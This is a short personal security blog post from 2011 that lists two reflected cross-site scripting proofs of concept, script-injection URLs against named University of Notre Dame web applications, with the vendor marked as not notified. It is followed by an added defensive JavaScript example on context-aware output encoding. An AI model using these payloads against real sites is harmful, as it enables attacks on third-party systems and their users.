This site is my sandbox. I post security vulnerabilities I discover, project updates, and the occasional rant. Comments are usually disabled, but if you need to contact me, I am sure you will find a way to.

University of Notre Dame

Date: Sept-25-2011
Vendor Notified: No
Proof of Concept:
https://apps.nd.edu/webdirectory/directory.cfm?cn=<script>alert('0');</script>


University of Notre Dame WebFile

Date: Sept-25-2011
Vendor Notified: No
Proof of Concept:
https://webfile.nd.edu/~</script><script>alert('0');</script>/apps/webfile

 

Note:
After hitting the URL, go back to the WebFile login (https://webfile.nd.edu) and use any dummy login credentials. The previously injected XSS will still be present and will trigger an internal server error.
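
A defender's view of the two proofs of concept above, as an added example that is not from the original post or from the affected applications. It assumes the `cn` value is echoed into HTML and the path segment into an inline script string (inferred from the payload shapes, not confirmed by the page); all function names are hypothetical.

```javascript
// Added example; function names are hypothetical, reflection contexts are assumed.
// Constructed samples: the two payloads from the proofs of concept, URL-decoded.
const CN_VALUE = "<script>alert('0');</script>";
const PATH_SEGMENT = "</script><script>alert('0');</script>";

const HTML_ENTITIES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

// HTML body/attribute context: encode every character the HTML parser treats as markup.
function htmlEscape(value) {
  return String(value).replace(/[&<>"']/g, (c) => HTML_ENTITIES[c]);
}

// Inline <script> string context: JSON.stringify handles quotes and backslashes,
// but the HTML parser still ends the block at a literal "</script>", so "<", ">"
// and "&" are rewritten as \uXXXX escapes (plus the JS line separators).
function jsStringForInlineScript(value) {
  return JSON.stringify(String(value)).replace(
    /[<>&\u2028\u2029]/g,
    (c) => "\\u" + c.charCodeAt(0).toString(16).padStart(4, "0")
  );
}

// Assumed vulnerable pattern: request data concatenated into an inline script.
function renderNaive(segment) {
  return '<script>var home = "' + segment + '";</script>';
}

// Hardened form of the same template.
function renderHardened(segment) {
  return "<script>var home = " + jsStringForInlineScript(segment) + ";</script>";
}

// Rough check: how many script elements would an HTML parser open in this markup?
function countScriptOpenings(html) {
  return (html.match(/<script\b/gi) || []).length;
}

console.log(htmlEscape(CN_VALUE));
console.log(countScriptOpenings(renderNaive(PATH_SEGMENT)), renderNaive(PATH_SEGMENT));
console.log(countScriptOpenings(renderHardened(PATH_SEGMENT)), renderHardened(PATH_SEGMENT));
```

The encoder has to match the output context: `htmlEscape` alone would not make the inline-script case safe against quote or backslash breakouts, and `JSON.stringify` alone leaves `</script>` intact.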


Copyright © 2012 benburns.org